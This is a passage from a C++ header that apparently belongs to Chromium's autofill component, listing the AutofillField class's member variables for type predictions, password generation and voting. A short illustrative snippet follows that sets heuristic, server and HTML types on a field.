field, as determined by the Autofill server. ServerFieldType server_type_; // The possible types of the field, as determined by the Autofill server, // including |server_type_| as the first item. std::vector<AutofillQueryResponseContents::Field::FieldPrediction> server_predictions_; // The type of the field, as determined by the local heuristics. ServerFieldType heuristic_type_; // The type of the field. Overrides all other types (html_type_, // heuristic_type_, server_type_). // |AutofillType(NO_SERVER_DATA)| is used when this |overall_type_| has not // been set. AutofillType overall_type_; // The type of the field, as specified by the site author in HTML. HtmlFieldType html_type_; // The "mode" of the field, as specified by the site author in HTML. // Currently this is used to distinguish between billing and shipping fields. HtmlFieldMode html_mode_; // The set of possible types for this field. ServerFieldTypeSet possible_types_; // Used to track whether this field is a phone prefix or suffix. PhonePart phone_part_; // The default value returned by the Autofill server. std::string default_value_; // Used to hold the position of the first digit to be copied as a substring // from credit card number. size_t credit_card_number_offset_; // Whether the field was autofilled then later edited. bool previously_autofilled_; // Whether the field should be filled when it is not the highlighted field. bool only_fill_when_focused_; // The parseable name attribute, with unnecessary information removed (such as // a common prefix shared with other fields). Will be used for heuristics // parsing. base::string16 parseable_name_; // The type of password generation event, if it happened. 
AutofillUploadContents::Field::PasswordGenerationType generation_type_; // Whether the generated password was changed by user. bool generated_password_changed_; // The outcome of HTML parsing based form classifier. AutofillUploadContents::Field::FormClassifierOutcome form_classifier_outcome_; // The vote type, if the autofill type is USERNAME or any password vote. // Otherwise, the field is ignored. |vote_type_| provides context as to what // triggered the vote. AutofillUploadContents::Field::VoteType vote_type_; DISALLOW_COPY_AND_ASSIGN(AutofillField); }; } // namespace autofill #endif // COMPONENTS_AUTOFILL_CORE_BROWSER_AUTOFILL_FIELD_H_
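A short, purely illustrative sketch (not Chromium code) that exercises the setters declared above to show how heuristic, server, and HTML signals feed into Type(). The enum values are assumed to exist in field_types.h, and the helper function itself is hypothetical.

#include "base/strings/utf_string_conversions.h"
#include "components/autofill/core/browser/autofill_field.h"

namespace autofill {

// Hypothetical helper, for illustration only.
void PopulatePredictions(const FormFieldData& form_field) {
  AutofillField field(form_field, base::ASCIIToUTF16("name_1"));

  // Local heuristics and the server may disagree; Type() returns the resolved
  // prediction (ComputedType() unless overridden via SetTypeTo()).
  field.set_heuristic_type(NAME_FIRST);
  field.set_server_type(NAME_FULL);

  // An autocomplete attribute contributes an HTML type as well.
  field.SetHtmlType(HTML_TYPE_GIVEN_NAME, HTML_MODE_NONE);

  AutofillType resolved = field.Type();
  (void)resolved;  // a caller would typically fill or vote based on this
}

}  // namespace autofill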
2,502